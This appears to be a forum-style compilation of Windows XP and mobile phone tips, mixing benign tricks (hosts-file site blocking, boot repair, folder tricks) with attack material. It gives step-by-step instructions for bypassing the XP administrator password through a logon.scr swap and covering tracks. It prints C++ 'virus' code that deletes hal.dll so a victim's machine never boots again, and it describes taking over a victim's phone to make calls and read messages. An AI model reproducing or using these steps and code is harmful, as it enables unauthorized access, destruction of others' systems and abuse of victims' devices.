Hide ur drives

How to Hide the drives(c:,d:,e:,a:...etc)
How to Hide the drives(c:,d:,e:,a:...etc)
This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.

1.Go to start->run.Type regedit.Now go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane create a new DWORD item and name it NoDrives(it is case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) .Now restart your computer. So, now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again. Magic........lol....

Block websites without any software

block webSites without any Softwares !!__________________________________________________________
Steps

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable.
5] Done!

example :

127.0.0.1 localhost
127.0.0.2 www.orkut.com

- www.orkut.com is now unaccessable

For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE:
127.0.0.3 www.yahoo.com
127.0.0.4 www.msn.com
127.0.0.5 www.google.com

This also works with banner sites, just find the host name of the server with the banners and do the same thing with that addy.

Hoep this small tutorial could keep you going in simple way of blocking websites

Hack windows xp passwords

Here are the steps involved to Hack the Window XP Administrator Password .
1. Go to Start –> Run –> Type in CMD 2. You will get a command prompt. Enter these commands the way it is given 3. cd\ 4. cd\ windows\system32 5. mkdir temphack 6. copy logon.scr temphack\logon.scr 7. copy cmd.exe temphack\cmd.exe 8. del logon.scr 9. rename cmd.exe logon.scr 10. exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator PasswordA Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.
1. Go to Start –> Run –> Type in CMD 2. You will get a command prompt. Enter these commands the way it is given 3. cd\ 4. cd\ windows\system32\temphack 5. copy logon.scr C:\windows\system32\logon.scr 6. copy cmd.exe C:\windows\system32\cmd.exe 7. exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.
Via internetbusinessdaily.net
Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.
Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 - because of the updated “user rights management” in NTFS - file level rights etc. This does not work on a system using NTFS.

HOW TO CREATE NAMLESS FOLDERS

hi follow the step:-

Just click on rename and type alt + 0160 (on the numeric keypad, Laptoper’s excuse) it will make an invisible character

Note: This will only work if you have the file extensions hidden.

You can use this only for one icon of each type (shortcut, folder, exe, txt, jpg or whatever you have on your desktop)

for the second icon type: alt+0160 alt+0160
for the third type: alt+0160 alt+0160 alt+0160

Tips to speed up the boot process.

Hi guys,

u must have faced some problems like ur system really slows down when u install some new softwares especially after u format the systema nd then install softwares like office, winamp, wizip etc..
well what some basic things u can do is
1. start-> run-> msconfig-> startup-> and in this deselect the softwares boot process just by unticking that, it will surely help ur system in fastening up the boot process.
2. my computer-> properties-> advanced->under performance --> setting --> advance --> under virtual memor --> change --> choose drive where OS is running --> Custom size --> type (size 2*RAM Size) both Inital size and Maximum size --> OK --> restart the system.

Try this one only if u r aware of the registry.
Every time u install a new software or make some changes into that, then a folder is created called PREFETCH folders.
now u can go into the registry and then make the value of the prefetch folder from 1 to 0.
this will really save a lot of space as well also it will fasten up the booting process as well.

Lock folders in XP without any software
Suppose you want to lock the folder abc in c: which has the path c:\abc. In the same drive create a text file and type
ren abc abc.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as lock.bat

create another text file and type in it
ren abc.{21EC2020-3AEA-1069-A2DD-08002B30309D} abc
Now save this text file as key.bat

Now you can see 2 batch files lock and key.Press lock and the folder abc will change to control panel and you cannot view its contents.Press key and you will get back your original folder.

XP boot

XP boot problems If you have used windows XP then you surely have experienced one or more boot problems.
here i have listed most frequent boot failure problems and have also tried to provide the answers for the same./b]
hope you will find this useful.
1.when you first power on your pc, the bios after completing its routines examines the MBR(master boot record) and starts booting sequence.
At this point sometimes boot failure occurs.
fix: insert windows XP CD , choose repair and enter "FIXMBR"

2. next step is to call NTLDR(NT loader) this in turn loads "boot.ini" if this file is missing a message "NTLDR is missing" gets displayed . i think most are familiar with this error.
fix: enter "fixboot.c" after choosing repair and copy "NTloader" from setup CD.

3. in case multiple operating systems the boot menu gets displayed. then the user is asked to
select one.
the message "boot.ini" gets displayed
fix: enter "bootcfg/rebuild after choosing repair.

4. Then all the installed hardware components are checked (if you want to see this process
disable the splash screen)
"NTdetect not found"
fix: enter windows disk and copy "\i386\ntdetect"

5. Loading of kernels
" Bluescreen of death"
fix: enter setup disk and select repair. then repair boot partition.
if this fails reinstalling windows is only solution.

6. Next step is to load all the device drivers.
" Bluescreen of death"
fix: boot windows in safe mode. then remove the faulty driver/s .
i faced this problem not too long ago with my TV tuner card and the solution is to remove the hardware.

7. windows hangs at "windows is booting...."
fix: turn off the pc and go to microsoft website.
You will find about a billion problems with solutons.
8. windows services startup.
" Bluescreen of death"
cause: viruses
fix: boot in safe mode , remove the virus and repair windows.
9. incorrect password
fix: use a password recovery disk.(search GOOGLE for the s/w i wont tell you)
don't use this if the pc doesn't belong to

Have a look ... Its good

Powerful c++ virus...........

This is a powerful C++ virus that I have made, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.
The Original Code:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

Siemens S1/S3:
Here's a trick to play Tetris, also known as Klotz on a Siemens S1.
Turn the phone on. Enter PIN. Before the telephone has logged in to the your GSM net do the following steps.
1: Choose F 9 (function settings)
2: Choose send own number and push the right button for choose.
3: Push 9
USE 2 as <> , rotate the klotz with 5 and drop with 4.
[I have just heard from one of the programmers of the phone that Tetris was in the phone during development, but it was removed before it was produced. Apparently someone has the patent on games in mobile phones and Siemens didn't want to pay the licensing fees. It was either in Menu F-9-9 or it's not there at all.]

well this works in java handsets as well as symbian handsets,,,,now don't say that this one doesn't work coz i tested it myself on SE W550i and Nokia 6600,,,but the condition is that victim must accept ur request anyhow,,,n then u have complete access over his cell fone,,,,u can even make calls from his balance( i did in both the handsets),,,but remember---------DON"T PRESS CALL KEY TO MAKE CALLS FROM BALANCE OF VICTIM,,,just use scroll key twice after writing the number(prefer this format +9199******** when making call)

but pls note that many of its features do not work in nokia handsets,,,but it simply roxxxxx in sony handsetsu can do almost everything as i said

the victim might have to accept two or three times in the beginning only,,,,but then u have complete access to his cell and u can do things like changing his profile,reading/deleting his messages,switch his cell off n much more,,,,so don't get harassed by the fact that it isn't true hacking,,,it is really something great,,,just give a try.

THIS WORKS FOR BOTH NOKIA AND SONY-ERICSSON.
